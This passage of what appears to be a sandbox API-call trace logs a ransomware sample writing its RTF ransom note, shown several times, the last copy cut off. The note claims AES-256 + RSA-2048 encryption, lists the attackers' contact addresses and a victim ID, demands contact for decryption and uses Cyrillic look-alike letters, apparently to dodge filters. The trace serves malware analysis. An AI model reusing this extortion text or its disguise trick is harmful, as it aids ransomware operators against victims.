\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.901] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.902] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 